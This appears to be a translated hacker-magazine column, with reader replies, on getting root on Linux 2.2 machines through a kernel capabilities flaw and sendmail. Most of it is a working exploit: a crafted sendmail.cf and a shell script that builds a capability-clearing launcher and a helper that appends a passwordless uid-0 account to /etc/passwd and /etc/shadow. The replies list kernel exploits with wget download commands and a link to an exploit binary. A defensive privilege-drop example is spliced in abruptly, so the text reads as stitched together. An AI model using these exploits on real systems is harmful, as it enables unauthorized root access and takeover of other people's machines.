zbeng

how to get root on a Linux box


Starting with this issue, I thought I'd set up a column for "script kiddies", for no other reason than that I'm a very lazy guy, and I remember that back in days not long gone I was greedy for easy-to-use programs that would give me root in no more than 10 minutes on various Linux boxes. And since among the magazine's readers there are surely some who want the same...

Recently it was discovered that 2.2.x kernels have a big problem, and that problem is exactly what we're going to talk about today.

"Capabilities", required by one of the POSIX standards, were recently implemented in the Linux kernel, more precisely from about 2.2 onwards. These "capabilities" are in fact a new way of controlling privileges, which state more specifically what privileged processes may do (I don't want to be too mean to the magazine's readers, but you do know what processes are, right?).

The problem with these capabilities is that they are inherited from the parent process by the child process exactly as they are. And now the way to exploit it: if we set all the capabilities to 0 (that is, the least privileged mode possible), a program like sendmail, which tries to do a setgid and setuid before doing things that could harm the system if run as root, will no longer manage to do so, and will carry on running as root. And if you have a program running as root that does whatever you want, is there still any problem controlling that machine? I think not.

Good. And since the column is called "sKript Kiddo", let's now see the script that makes the whole story work properly. But don't rush. First let me explain what I want to do. First of all I intend to play around with sendmail, that is, to use sendmail as a skeleton key into the system. And as you know, sendmail has a configuration file called sendmail.cf. Well, I don't like that file, so I'm going to write another one. Then I intend to make a little program that blows away sendmail's privileges, so that sendmail can no longer setuid and setgid, and then the sendmail.cf I wrote will tell sendmail to run a program that writes a new line into /etc/passwd and /etc/shadow, which will give me a root account.

So. Copy everything that follows into a file you will name sendmail.cf. At the end of the file, about the 15th line going top to bottom, there is a commented line. Follow the instructions there.

--- Cut Here (sendmail.cf) --

V8/Berkeley

Cwlocalhost

Fw/etc/sendmail.cw

DSlocalhost

CO @ % !

C..

C[[

Kaccess hash -o /etc/mail/access

FR-o /etc/mail/relay-domains

Kdequote dequote

CE root

DnMAILER-DAEMON

CPREDIRECT

DZ8.9.3

O SevenBitInput=False

O EightBitMode=pass8

O AliasWait=10

O AliasFile=/etc/aliases

O MinFreeBlocks=100

O BlankSub=.

O HoldExpensive=False

O DeliveryMode=background

O AutoRebuildAliases=True

O TempFileMode=0600

O HelpFile=/usr/lib/sendmail.hf

O SendMimeErrors=True

O ForwardPath=$z/.forward.$w:$z/.forward

O ConnectionCacheSize=2

O ConnectionCacheTimeout=5m

O UseErrorsTo=False

O LogLevel=9

O CheckAliases=False

O OldStyleHeaders=True

O PrivacyOptions=authwarnings

O QueueDirectory=/tmp

O Timeout.connect=1m

O Timeout.queuereturn=5d

O Timeout.queuewarn=4h

O SuperSafe=True

O StatusFile=/var/log/sendmail.st

O DefaultUser=8:12

O TryNullMXList=true

O RefuseLA=12

O MaxDaemonChildren=20

O ConnectionRateThrottle=1

O HostsFile=/etc/hosts

O SmtpGreetingMessage=$j Sendmail $v/$Z; $b

O UnixFromLine=From $g $d

O OperatorChars=.:%@!^/[]+

O DontProbeInterfaces=true

Pfirst-class=0

Pspecial-delivery=100

Plist=-30

Pbulk=-60

Pjunk=-100

Troot

Tdaemon

Tuucp

H?P?Return-Path: <$g>

HReceived: $?sfrom $s $.$?_($?s$|from $.$_)

$.by $j ($v/$Z)$?r with $r$. id $i$?u

for $u; $|;

$.$b

H?D?Resent-Date: $a

H?D?Date: $a

H?F?Resent-From: $?x$x <$g>$|$g$.

H?F?From: $?x$x <$g>$|$g$.

H?x?Full-Name: $x

H?M?Resent-Message-Id: <$t.$i@$j>

H?M?Message-Id: <$t.$i@$j>

S3

R$@ $@ <@>

R$* $: $1 <@> mark addresses

R$* < $* > $* <@> $: $1 < $2 > $3 unmark <addr>

R@ $* <@> $: @ $1 unmark @host:...

R$* :: $* <@> $: $1 :: $2 unmark node::addr

R:include: $* <@> $: :include: $1 unmark :include:...

R$* [ $* : $* ] <@> $: $1 [ $2 : $3 ] unmark IPv6 addrs

R$* : $* [ $* ] $: $1 : $2 [ $3 ] <@> remark if leading colon

R$* : $* <@> $: $2 strip colon if marked

R$* <@> $: $1 unmark

R$* ; $1 strip trailing semi

R$* < $* ; > $1 < $2 > bogus bracketed semi

R$@ $@ :; <@>

R$* $: < $1 > housekeeping <>

R$+ < $* > < $2 > strip excess on left

R< $* > $+ < $1 > strip excess on right

R<> $@ < @ > MAIL FROM:<> case

R< $+ > $: $1 remove housekeeping <>

R@ $+ , $+ @ $1 : $2 change all "," to ":"

R@ $+ : $+ $@ $>96 < @$1 > : $2 handle <route-addr>

R $+ : $* ; @ $+ $@ $>96 $1 : $2 ; < @ $3 > list syntax

R $+ : $* ; $@ $1 : $2; list syntax

R$+ @ $+ $: $1 < @ $2 > focus on domain

R$+ < $+ @ $+ > $1 $2 < @ $3 > move gaze right

R$+ < @ $+ > $@ $>96 $1 < @ $2 > already canonical

R$* < @ $* : $* > $* $1 < @ $2 $3 > $4 nix colons in addrs

R$- ! $+ $@ $>96 $2 < @ $1 .UUCP > resolve uucp names

R$+ . $- ! $+ $@ $>96 $3 < @ $1 . $2 > domain uucps

R$+ ! $+ $@ $>96 $2 < @ $1 .UUCP > uucp subdomains

R$* % $* $1 @ $2 First make them all @s.

R$* @ $* @ $* $1 % $2 @ $3 Undo all but the last.

R$* @ $* $@ $>96 $1 < @ $2 > Insert < > and finish

R$* $@ $>96 $1

S96

R$* < @ localhost > $* $: $1 < @ $j . > $2 no domain at all

R$* < @ localhost . $m > $* $: $1 < @ $j . > $2 local domain

R$* < @ localhost . UUCP > $* $: $1 < @ $j . > $2 .UUCP domain

R$* < @ [ $+ ] > $* $: $1 < @@ [ $2 ] > $3 mark [a.b.c.d]

R$* < @@ $=w > $* $: $1 < @ $j . > $3 self-literal

R$* < @@ $+ > $* $@ $1 < @ $2 > $3 canon IP addr

R$* < @ $+ . UUCP > $* $: $1 < @ $[ $2 $] . UUCP . > $3

R$* < @ $+ . . UUCP . > $* $@ $1 < @ $2 . > $3

R$* < @ $=w > $* $: $1 < @ $2 . > $3

R$* < @ $j > $* $: $1 < @ $j . > $2

R$* < @ $=M > $* $: $1 < @ $2 . > $3

R$* < @ $* $=P > $* $: $1 < @ $2 $3 . > $4

R$* < @ $* . . > $* $1 < @ $2 . > $3

S4

R$* <@> $@ handle <> and list:;

R$* < @ $+ . > $* $1 < @ $2 > $3

R$* < @ *LOCAL* > $* $1 < @ $j > $2

R$* < $+ > $* $1 $2 $3 defocus

R@ $+ : @ $+ : $+ @ $1 , @ $2 : $3 <route-addr> canonical

R@ $* $@ @ $1 ... and exit

R$+ @ $- . UUCP $2!$1 u@h.UUCP => h!u

R$+ % $=w @ $=w $1 @ $2 u%host@host => u@host

S97

R$* $: $>3 $1

R$* $@ $>0 $1

S0

R$* $: $>Parse0 $1 initial parsing

R<@> $#local $: <@> special case error msgs

R$* $: $>98 $1 handle local hacks

R$* $: $>Parse1 $1 final parsing

SParse0

R<@> $@ <@> special case error msgs

R$* : $* ; <@> $#error $@ 5.1.3 $: "List:; syntax illegal for recipient addresses"

#R@ <@ $* > < @ $1 > catch "@@host" bogosity

R<@ $+> $#error $@ 5.1.3 $: "User address required"

R$* $: <> $1

R<> $* < @ [ $+ ] > $* $1 < @ [ $2 ] > $3

R<> $* <$* : $* > $* $#error $@ 5.1.3 $: "Colon illegal in host name part"

R<> $* $1

R$* < @ . $* > $* $#error $@ 5.1.2 $: "Invalid host name"

R$* < @ $* .. $* > $* $#error $@ 5.1.2 $: "Invalid host name"

R$* < @ > $* $@ $>Parse0 $>3 $1 user@ => user

R< @ $=w . > : $* $@ $>Parse0 $>3 $2 @here:... -> ...

R$- < @ $=w . > $: $(dequote $1 $) < @ $2 . > dequote "foo"@here

R< @ $+ > $#error $@ 5.1.3 $: "User address required"

R$* $=O $* < @ $=w . > $@ $>Parse0 $>3 $1 $2 $3 ...@here -> ...

R$- $: $(dequote $1 $) < @ *LOCAL* > dequote "foo"

R< @ *LOCAL* > $#error $@ 5.1.3 $: "User address required"

R$* $=O $* < @ *LOCAL* >

$@ $>Parse0 $>3 $1 $2 $3 ...@*LOCAL* -> ...

R$* < @ *LOCAL* > $: $1

SParse1

R$* < @ [ $+ ] > $* $: $>98 $1 < @ [ $2 ] > $3 numeric internet spec

R$* < @ [ $+ ] > $* $#esmtp $@ [$2] $: $1 < @ [$2] > $3 still numeric: send

R$+ < @ $=w . > $: < $(virtuser $1 @ $2 $@ $1 $: @ $) > $1 < @ $2 . >

R<@> $+ + $* < @ $* . >

$: < $(virtuser $1 + * @ $3 $@ $1 $: @ $) > $1 + $2 < @ $3 . >

R<@> $+ + $* < @ $* . >

$: < $(virtuser $1 @ $3 $@ $1 $: @ $) > $1 + $2 < @ $3 . >

R<@> $+ < @ $+ . > $: < $(virtuser @ $2 $@ $1 $: @ $) > $1 < @ $2 . >

R<@> $+ $: $1

R< error : $- $+ > $* $#error $@ $(dequote $1 $) $: $2

R< $+ > $+ < @ $+ > $: $>97 $1

R$=L < @ $=w . > $#local $: @ $1 special local names

R$+ < @ $=w . > $#local $: $1 regular local name

R$* < @ $* > $* $: $>95 < $S > $1 < @ $2 > $3 glue on smarthost name

R$* < @$* > $* $#esmtp $@ $2 $: $1 < @ $2 > $3 user@host.domain

R$=L $#local $: @ $1 special local names

R$+ $#local $: $1 regular local names

S5

R$+ + * $#local $@ $&h $: $1

R$+ + $* $#local $@ + $2 $: $1 + *

R$+ $: <> $1

R< > $+ $: < $H > $1 try hub

R< > $+ $: < $R > $1 try relay

R< > $+ $: < > < $1 $&h > nope, restore +detail

R< > < $+ + $* > $* < > < $1 > + $2 $3 find the user part

R< > < $+ > + $* $#local $@ $2 $: @ $1 strip the extra +

R< > < $+ > $@ $1 no +detail

R$+ $: $1 <> $&h add +detail back in

R$+ <> + $* $: $1 + $2 check whether +detail

R$+ <> $* $: $1 else discard

R< local : $* > $* $: $>95 < local : $1 > $2 no host extension

R< error : $* > $* $: $>95 < error : $1 > $2 no host extension

R< $- : $+ > $+ $: $>95 < $1 : $2 > $3 < @ $2 >

R< $+ > $+ $@ $>95 < $1 > $2 < @ $1 >

S95

R< > $* $@ $1 strip off null relay

R< error : $- $+ > $* $#error $@ $(dequote $1 $) $: $2

R< local : $* > $* $>CanonLocal < $1 > $2

R< $- : $+ @ $+ > $*<$*>$* $# $1 $@ $3 $: $2<@$3> use literal user

R< $- : $+ > $* $# $1 $@ $2 $: $3 try qualified mailer

R< $=w > $* $@ $2 delete local host

R< $+ > $* $#relay $@ $1 $: $2 use unqualified mailer

SCanonLocal

R< $* > < @ $+ > : $+ $@ $>97 $3

R< $* > $+ $=O $+ < @ $+ > $@ $>97 $2 $3 $4

R< $* > $* < @ $* . > $: < $1 > $2 < @ $3 >

R< > $* < @ $* > $* $#local $@ $1@$2 $: $1

R< > $+ $#local $@ $1 $: $1

R< $+ @ $+ > $* < @ $* > $: < $1 > $3 < @ $4 >

R< $+ > $* <@ $* > $* $#local $@ $2@$3 $: $1

R< $+ > $* $#local $@ $2 $: $1

S93

R$=E < @ *LOCAL* > $@ $1 < @ $j . > leave exposed

R$=E < @ $=M . > $@ $1 < @ $2 . >

R$=E < @ $=w . > $@ $1 < @ $2 . >

R$* < @ $=M . > $* $: $1 < @ $2 . @ $M > $3 convert masqueraded doms

R$* < @ $=w . > $* $: $1 < @ $2 . @ $M > $3

R$* < @ *LOCAL* > $* $: $1 < @ $j . @ $M > $2

R$* < @ $+ @ > $* $: $1 < @ $2 > $3 $M is null

R$* < @ $+ @ $+ > $* $: $1 < @ $3 . > $4 $M is not null

S94

R$* < @ *LOCAL* > $* $: $1 < @ $j . > $2

S98

R wmail.$- $# wmail $: $1

R wmail.$- < @ $=w . > $# wmail $: $1

R wmail.$- < @ [ $=w ] . > $# wmail $: $1

R wmail.$- < @ [ $+ ] . > $# wmail $: $1

R$* < @ $+ .REDIRECT. > $: $1 < @ $2 . REDIRECT . > < ${opMode} >

R$* < @ $+ .REDIRECT. > $: $1 < @ $2 . REDIRECT. >

R$* < @ $+ .REDIRECT. > < $- > $# error $@ 5.1.1 $: "551 User has moved; please try " <$1@$2>

SLookUpDomain

R<$+> <$+> <$*> $: < $(access $1 $: ? $) > <$1> <$2> <$3>

R<?> <$+.$+> <$+> <$*> $@ $>LookUpDomain <$2> <$3> <$4>

R<?> <$+> <$+> <$*> $@ <$2> <$3>

R<$*> <$+> <$+> <$*> $@ <$1> <$4>

SLookUpAddress

R<$+> <$+> <$*> $: < $(access $1 $: ? $) > <$1> <$2> <$3>

R<?> <$+.$-> <$+> <$*> $@ $>LookUpAddress <$1> <$3> <$4>

R<?> <$+> <$+> <$*> $@ <$2> <$3>

R<$*> <$+> <$+> <$*> $@ <$1> <$4>

SCanonAddr

R$* $: $>Parse0 $>3 $1 make domain canonical

R< @ $+ > : $* @ $* < @ $1 > : $2 % $3 change @ to % in src route

R$* < @ $+ > : $* : $* $3 $1 < @ $2 > : $4 change to % hack.

R$* < @ $+ > : $* $3 $1 < @ $2 >

SParseRecipient

R$* $: <?> $>CanonAddr $1

R<?> $* < @ $* . > <?> $1 < @ $2 > strip trailing dots

R<?> $- < @ $* > $: <?> $(dequote $1 $) < @ $2 > dequote local part

R<?> $* $=O $* < @ $* > $: <NO> $1 $2 $3 < @ $4>

R<?> $* $@ $1

R<NO> $* < @ $* $=R > $: <RELAY> $1 < @ $2 $3 >

R<NO> $* < @ $+ > $: $>LookUpDomain <$2> <NO> <$1 < @ $2 >>

R<$+> <$+> $: <$1> $2

R<RELAY> $* < @ $* > $@ $>ParseRecipient $1

R<$-> $* $@ $2

SLocal_check_relay

Scheck_relay

R$* $: $1 $| $>"Local_check_relay" $1

R$* $| $* $| $#$* $#$3

R$* $| $* $| $* $@ $>"Basic_check_relay" $1 $| $2

SBasic_check_relay

R$* $: < ${deliveryMode} > $1

R< d > $* $@ deferred

R< $* > $* $: $2

R$+ $| $+ $: $>LookUpDomain < $1 > <?> < $2 >

R<?> < $+ > $: $>LookUpAddress < $1 > <?> < $1 >

R<?> < $+ > $: $1

R<OK> < $* > $@ OK

R<RELAY> < $* > $@ RELAY

R<REJECT> $* $#error $@ 5.7.1 $: "550 Access denied"

R<DISCARD> $* $#discard $: discard

R<$+> $* $#error $@ 5.7.1 $: $1

SLocal_check_mail

Scheck_mail

R$* $: $1 $| $>"Local_check_mail" $1

R$* $| $#$* $#$2

R$* $| $* $@ $>"Basic_check_mail" $1

SBasic_check_mail

R$* $: < ${deliveryMode} > $1

R< d > $* $@ deferred

R< $* > $* $: $2

R<> $@ <OK>

R$* $: <?> $>CanonAddr $1

R<?> $* < @ $+ . > <?> $1 < @ $2 > strip trailing dots

R<?> $* < $* $=P > $* $: <OK> $1 < @ $2 $3 > $4

R<?> $* < @ $+ > $* $: <OK> $1 < @ $2 > $3 ... unresolvable OK

R<$+> $* < @localhost > $: < ? $&{client_name} > <$1> $2 < @localhost >

R<$+> $* < @localhost.$m >

$: < ? $&{client_name} > <$1> $2 < @localhost.$m >

R<$+> $* < @localhost.UUCP >

$: < ? $&{client_name} > <$1> $2 < @localhost.UUCP >

R<? $=w> <$+> $* <?> <$2> $3

R<? $+> <$+> $* $#error $@ 5.5.4 $: "553 Real domain name required"

R<?> <$+> $* $: <$1> $2

R<$+> $* < @ $+ > $* $: <USER $(access $2@ $: ? $) > <$1> $2 < @ $3 > $4

R<USER ?> <$+> $* < @ $* > $*

$: <USER $(access $2@$3$4 $: ? $) > <$1> $2 < @ $3 > $4

R<USER ?> <$+> $+ < @ $+ > $*

$: <USER $(access $2@$3 $: ? $) > <$1> $2 < @ $3 > $4

R<USER ?> <$+> $* < @ $+ > $*

$: $>LookUpDomain <$3> <$1> <>

R<?> $* $: <USER $(access $1@ $: ? $) > <?> $1

R<USER $+> <$+> $* $: <$1> $3

R<?> $* $: < ? $&{client_name} > $1

R<?> $* $@ <OK> ...local unqualed ok

R<? $+> $* $#error $@ 5.5.4 $: "553 Domain name required"

...remote is not

R<?> $* $@ <OK>

R<OK> $* $@ <OK>

R<TEMP> $* $#error $@ 4.1.8 $: "451 Sender domain must resolve"

R<PERM> $* $#error $@ 5.1.8 $: "501 Sender domain must exist"

R<RELAY> $* $@ <RELAY>

R<DISCARD> $* $#discard $: discard

R<REJECT> $* $#error $@ 5.7.1 $: "550 Access denied"

R<$+> $* $#error $@ 5.7.1 $: $1 error from access db

SLocal_check_rcpt

Scheck_rcpt

R$* $: $1 $| $>"Local_check_rcpt" $1

R$* $| $#$* $#$2

R$* $| $* $@ $>"Basic_check_rcpt" $1

SBasic_check_rcpt

R$* $: < ${deliveryMode} > $1

R< d > $* $@ deferred

R< $* > $* $: $2

R$* $: $>ParseRecipient $1 strip relayable hosts

R$* $: <?> $1

R<?> $+ < @ $=w > $: <> <USER $1> <FULL $1@$2> <HOST $2> <$1 < @ $2 >>

R<?> $+ < @ $* > $: <> <FULL $1@$2> <HOST $2> <$1 < @ $2 >>

R<?> $+ $: <> <USER $1> <$1>

R<> <USER $+> $* $: <$(access $1 $: $)> $2

R<> <FULL $+> $* $: <$(access $1 $: $)> $2

R<OK> <FULL $+> $* $: <$(access $1 $: $)> $2

R<> <HOST $+> $* $: <$(access $1 $: $)> $2

R<OK> <HOST $+> $* $: <$(access $1 $: $)> $2

R<> <$*> $: $1

R<OK> <$*> $: $1

R<RELAY> <$*> $: $1

R<REJECT> $* $#error $@ 5.2.1 $: "550 Mailbox disabled for this recipient"

R<$+> $* $#error $@ 5.2.1 $: $1 error from access db

R$+ < @ $=w > $@ OK

R$+ < @ $* $=R > $@ OK

R$+ < @ $* > $: $>LookUpDomain <$2> <?> <$1 < @ $2 >>

R<RELAY> $* $@ RELAY

R<$*> <$*> $: $2

R$* $: <?> $1

R<?> $* < @ $+ > $: <REMOTE> $1 < @ $2 >

R<?> $+ $@ OK

R<$+> $* $: $2

R$* $: <?> $&{client_name}

R<?> [$+] $: <BAD> [$1]

R<?> $* $~P $: <?> $[ $1 $2 $]

R<$-> $* $: $2

R$* . $1 strip trailing dots

R$@ $@ OK

R$=w $@ OK

R$* $=R $@ OK

R$* $: $>LookUpDomain <$1> <?> <$1>

R<RELAY> $* $@ RELAY

R<$*> <$*> $: $2

R$* $: $&{client_addr}

R$@ $@ OK originated locally

R0 $@ OK originated locally

R$=R $* $@ OK relayable IP address

R$* $: $>LookUpAddress <$1> <?> <$1>

R<RELAY> $* $@ RELAY relayable IP address

R<$*> <$*> $: $2

R$* $: [ $1 ] put brackets around it...

R$=w $@ OK ... and see if it is local

R$* $#error $@ 5.7.1 $: "550 Relaying denied"

Mprocmail, P=/usr/bin/procmail, F=DFMSPhnu9, S=11/31, R=21/31, T=DNS/RFC822/X-Unix,

A=procmail -Y -m $h $f $u

Msmtp, P=[iPC], F=mDFMuX, S=11/31, R=21, E=rn, L=990,

T=DNS/RFC822/SMTP,

A=IPC $h

Mesmtp, P=[iPC], F=mDFMuXa, S=11/31, R=21, E=rn, L=990,

T=DNS/RFC822/SMTP,

A=IPC $h

Msmtp8, P=[iPC], F=mDFMuX8, S=11/31, R=21, E=rn, L=990,

T=DNS/RFC822/SMTP,

A=IPC $h

Mrelay, P=[iPC], F=mDFMuXa8, S=11/31, R=61, E=rn, L=2040,

T=DNS/RFC822/SMTP,

A=IPC $h

S11

R$+ $: $>51 $1 sender/recipient common

R$* :; <@> $@ list:; special case

R$* $: $>61 $1 qualify unqual'ed names

R$+ $: $>94 $1 do masquerading

S21

R$+ $: $>51 $1 sender/recipient common

R$+ $: $>61 $1 qualify unqual'ed names

S31

R$+ $: $>51 $1 sender/recipient common

R:; <@> $@ list:; special case

R$* <@> $* $@ $1 <@> $2 pass null host through

R< @ $* > $* $@ < @ $1 > $2 pass route-addr through

R$* $: $>61 $1 qualify unqual'ed names

R$+ $: $>93 $1 do masquerading

S51

R< @ $+ > $* $@ < @ $1 > $2 resolve <route-addr>

R$+ < @ $+ .UUCP. > $: < $2 ! > $1 convert to UUCP form

R$+ < @ $* > $* $@ $1 < @ $2 > $3 not UUCP form

R< $&h ! > $- ! $+ $@ $2 < @ $1 .UUCP. >

R< $&h ! > $-.$+ ! $+ $@ $3 < @ $1.$2 >

R< $&h ! > $+ $@ $1 < @ $&h .UUCP. >

R< $+ ! > $+ $: $1 ! $2 < @ $Y > use UUCP_RELAY

R$+ < @ $+ : $+ > $@ $1 < @ $3 > strip mailer: part

R$+ < @ > $: $1 < @ *LOCAL* > if no UUCP_RELAY

S61

R$* < @ $* > $* $@ $1 < @ $2 > $3 already fully qualified

R$+ $@ $1 < @ *LOCAL* > add local qualification

S71

R$+ $: $>61 $1

R$+ $: $>93 $1

# on the next line replace the string /calea/spre with the current directory
# eg: /home/user

Mlocal, P=/calea/spre/add, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,

T=DNS/RFC822/X-Unix,

A=add -Y -a $h -d $u

Mprog, P=/usr/sbin/smrsh, F=lsDFMoqeu9, S=10/30, R=20/40, D=$z:/,

T=X-Unix,

A=sh -c $u

Mwmail, P=/usr/local/wMail/wmail,

F=lsD, S=10/30, R=20/40, D=/tmp/,

T=X-Unix,

A=/usr/local/wMail/wmail $u

S10

R<@> $n errors to mailer-daemon

R@ <@ $*> $n temporarily bypass Sun bogosity

R$+ $: $>50 $1 add local domain if needed

R$* $: $>94 $1 do masquerading

S20

R$+ < @ $* > $: $1 strip host part

S30

R<@> $n errors to mailer-daemon

R@ <@ $*> $n temporarily bypass Sun bogosity

R$+ $: $>50 $1 add local domain if needed

R$* $: $>93 $1 do masquerading

S40

R$+ $: $>50 $1 add local domain if needed

S50

R$* < @ $* > $* $@ $1 < @ $2 > $3 already fully qualified

R$+ $@ $1 < @ *LOCAL* > add local qualification

--- Cut here (done) --

And finally the script

--- CUT HERE ---
#!/bin/sh
#
# This script is adapted and modified from the programs that were
# published on the BUGTRAQ mailing list.
# Using it can cause damage and is generally against the law.
# Personally I recommend that you do not use it.
# I also recommend that you do not distribute it, even though it is
# under the GPL licence.
echo creez fisierele sursa
cat <<gata1> ex.c
#include <stdlib.h>
#include <unistd.h>
#include <linux/capability.h>
int main (void) {
cap_user_header_t header;
cap_user_data_t data;
header = malloc(8);
data = malloc(12);
header->pid = 0;
header->version = _LINUX_CAPABILITY_VERSION;
data->inheritable = data->effective = data->permitted = 0;
capset(header, data);
execlp("/usr/sbin/sendmail", "sendmail", "-t", "-C", "./sendmail.cf", NULL);
}
gata1
echo shi acuma cel de-al doilea
cat <<gata.2> add.c
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int main (void) {
int fd;
char string[250];
seteuid(0);
setegid(0);
setuid(0);
setgid(0);
system("chmod u+w /etc/shadow");
fd = open("/etc/passwd", O_APPEND|O_WRONLY);
strcpy(string, "shmekeru:@:0:0::/root:/bin/sh\n");
write(fd, string, strlen(string));
close(fd);
fd = open("/etc/shadow", O_APPEND|O_WRONLY);
strcpy(string, "shmekeru::11029:0:99999:7:::\n");
write(fd, string, strlen(string));
close(fd);
}
gata.2
echo compilez...
gcc -o add add.c
gcc -o ex ex.c
cat <<gata3> mailexp
From: spargatoru@foobar.com
To: root@localhost
Subject: foo

bar
.
gata3
echo rulez xploitu
./ex < mailexp
echo shi acuma ashteptatzi un pic...
sleep 10
echo root access pentru dumneavoastra
echo daca nu exista ssh instalat in sistem incercati
echo su shmekeru
ssh -lshmekeru localhost
-- Cut here (done) --
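The weakness the post relies on is that sendmail called setgid()/setuid() and carried on without checking whether the calls had actually worked; with every capability cleared the calls failed and sendmail kept running as root. The defensive lesson is that a privilege drop is something to verify, never to assume. The C program below is an added example written for this page, not code from the post, from BUGTRAQ or from sendmail: it drops to a target uid/gid, checks the return value of every call, confirms afterwards that the real and effective ids really changed, and finally checks that root cannot be regained. The function names are my own, and the program is run here against the caller's own ids (a constructed input) so that it works without root.

```c
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 when both the real and effective uid/gid equal the target, else 0.
 * This is the check sendmail did not do: it trusted setuid() to have worked. */
int ids_dropped_to(uid_t uid, gid_t gid)
{
    return getuid() == uid && geteuid() == uid &&
           getgid() == gid && getegid() == gid;
}

/* Drop privileges to uid/gid, failing closed on any error.
 * Returns 0 on success and -1 if any step failed or did not take effect. */
int drop_privileges_checked(uid_t uid, gid_t gid)
{
    /* Supplementary groups first; only root may call setgroups(), so only try it as root. */
    if (geteuid() == 0 && setgroups(0, NULL) != 0)
        return -1;

    /* Group before user: once we are no longer root we could not change the gid. */
    if (setgid(gid) != 0)
        return -1;

    if (setuid(uid) != 0)
        return -1;

    /* Verify instead of trusting the calls: a silently failed setuid() is exactly
     * the failure mode that left sendmail running as root in the post above. */
    if (!ids_dropped_to(uid, gid))
        return -1;

    /* If we dropped to a non-root uid, trying to get root back must now fail.
     * This also catches a saved uid that was left at 0. */
    if (uid != 0 && setuid(0) == 0)
        return -1;

    return 0;
}

int main(void)
{
    /* Constructed input: drop to our own ids so the example runs unprivileged.
     * A real daemon would pass the unprivileged service account's ids here. */
    uid_t target_uid = getuid();
    gid_t target_gid = getgid();

    if (drop_privileges_checked(target_uid, target_gid) != 0) {
        fprintf(stderr, "privilege drop failed, refusing to continue: %s\n",
                strerror(errno));
        return 1;
    }
    printf("now running as uid %u gid %u; root is not regainable\n",
           (unsigned)getuid(), (unsigned)getgid());
    return 0;
}
```

The important design choice is the order and the fail-closed behaviour: when `drop_privileges_checked()` returns -1 the daemon must exit rather than proceed, because "still root" is the dangerous state. Running the program as root with a service account's ids, and then inspecting the process with `ps -o user,group,pid,cmd`, is a quick way to confirm the drop took effect.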


2.4.17
newlocal - wget www.parit.org/newlocal
kmod - wget www.parit.org/kmod

2.4.18
brk
newlocal
kmod
km.2

2.4.19
brk
newlocal
kmod

2.4.20
ptrace
kmod
brk

2.4.21
brk
ptrace
w00t

2.4.22
km.2
brk
ptrace

2.4.23
mremap_pte
w00t

2.4.24
mremap_pte
w00t
Uselib24
elf

2.4.27
Uselib24
w00t
elf
elflbl

2.6.2
mremap_pte
krad
pwned

2.6.5 to 10
krad
pwned
krad3

www.parit.org has lots of interesting "stuff" :);)


Given that I'm no longer around here, I won't comment :D, but for 2.2.x and 2.0.x there are much, much simpler exploits. Unfortunately I no longer have the source, but I'll leave the link where I put it: http://rapidshare.de/files/38887651/0.tgz.html . Unpack it, then run it several times in a row, like: ./0;./0;./0;./0;./0;./0; . It gets uid 0 on any kernel listed above, and even on some 2.4 ones: 2.4.7, 2.4.10.
